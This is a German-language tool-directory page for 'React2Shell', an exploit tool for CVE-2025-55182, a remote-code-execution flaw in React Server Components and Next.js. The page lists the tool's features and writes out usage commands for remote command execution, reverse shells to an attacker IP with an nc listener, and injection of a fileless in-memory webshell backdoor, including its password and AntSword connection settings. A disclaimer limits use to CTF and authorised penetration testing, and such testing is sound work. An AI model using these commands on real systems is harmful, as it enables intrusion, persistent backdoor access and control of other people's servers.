Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-Toolbox | Kitploit
Tools/GitHubGitHub/lamaper/cve-2025-55182-toolbox
PersistenzmechanismenExploitationWebanwendungs-ExploitationPost-ExploitationCTFPenetrationstestsCommand and ControlRed TeamingPayload-Entwicklung
GitHublamaper/cve-2025-55182-toolbox

CVE-2025-55182-Toolbox

Repository anzeigen
1vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

React2Shell: Umfassendes Exploit-Tool für CVE-2025-55182

Autor: lamaper / BITs2Sys

Version: 1.0.1

Lizenz: MIT

📝 Werkzeugbeschreibung

Dieses Tool ist ein automatisiertes Penetrationstest-Tool, das speziell für CVE-2025-55182 (RCE durch Prototype-Pollution in React Server Components / Next.js) entwickelt wurde. Es ist für CTF-Wettbewerbe und autorisierte Sicherheitsdienstprojekte konzipiert und integriert Funktionen wie Schwachstellenverifikation, Outbound-Erkennung, Reverse Shells sowie In-Memory-Webshell-Injektion.

🚀 Kernfunktionen

  • Befehlsausführung mit einem Klick (--cmd) : Nutzt den NEXT_REDIRECT-Ausnahmemechanismus, um Base64-kodierte Befehlsausgabeergebnisse präzise zurückzuliefern.
  • Outbound-Status-Prüfung (--check-outbound) : Automatisierte Tests der Fähigkeit des Zielsystems, auf DNS, HTTP und ICMP zuzugreifen, um die Angriffspfadentscheidung zu unterstützen.
  • Interaktive Reverse Shell (--shell) : Integriert zwei Reverse-Shell-Modi (Bash und Python3) mit asynchroner Ausführung, um HTTP-Request-Hänger zu vermeiden.
  • Persistente In-Memory-Webshell (--inject-ms) : Injiziert eine speicherresidente Webshell durch Hijacking des Node.js http.Server-Event-Dispatch-Mechanismus, hinterlässt keine Dateien und ermöglicht persistente Kontrolle.
  • Interaktionsschnittstelle für In-Memory-Webshell (--ms-cmd) : Ein vom Schwachstellen-Trigger-Pfad unabhängiger Interaktionsmodus; nach erfolgreicher Injektion können Befehle direkt über die Hintertür ausgeführt werden.

🛠️ Installation und Abhängigkeiten

Dieses Tool basiert auf Python 3 und benötigt nur die Installation der requests-Bibliothek.

root@kitploit:~
pip install requests

📖 Benutzerhandbuch

0. Überprüfen, ob die Schwachstelle existiert

https://github.com/assetnote/react2shell-scanner ist ein nützliches Erkennungstool.

1. Grundlegende Befehlsausführung

Direktes Abrufen von Zielsysteminformationen:

root@kitploit:~
python exploit.py --url http://target.com/ --cmd "id"
python exploit.py --url http://target.com/ --cmd "cat /flag"

2. Outbound-Erkennung

Vor dem Versuch einer Reverse Shell prüfen, ob das Zielsystem eine Verbindung zum externen Netz herstellen kann:

root@kitploit:~
python exploit.py --url http://target.com/ --check-outbound

3. Reverse Shell

Bash-Modus:

root@kitploit:~
# 攻击机执行监听: nc -lvnp 4444
python exploit.py --url http://target.com/ --shell bash --ip <你的IP> --port 4444

Python-Modus:

root@kitploit:~
python exploit.py --url http://target.com/ --shell python --ip <你的IP> --port 4444

4. In-Memory-Webshell-Nutzung (Persistenz)

Injektion der In-Memory-Webshell:

root@kitploit:~
python exploit.py --url http://target.com/ --inject-ms

Befehlsausführung über die In-Memory-Webshell (nach erfolgreicher Injektion):

root@kitploit:~
python exploit.py --url http://target.com/ --ms-cmd "whoami"

Hinweis: Der Standard-Mount-Pfad der In-Memory-Webshell ist /?pass, ausgelöst durch POST-Parameter pwd.

Verbindung über AntSword (China AntSword):

Verbindungspasswort: pwd, Verbindungsmodus: CMDLINUX

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für rechtlich zulässige Sicherheitsforschung, CTF-Wettbewerbe und autorisierte Penetrationstests bestimmt. Die Verwendung für rechtswidrige Angriffe ist strengstens untersagt. Sämtliche Konsequenzen aus der Nutzung dieses Tools trägt allein der Benutzer.


Tool herunterladen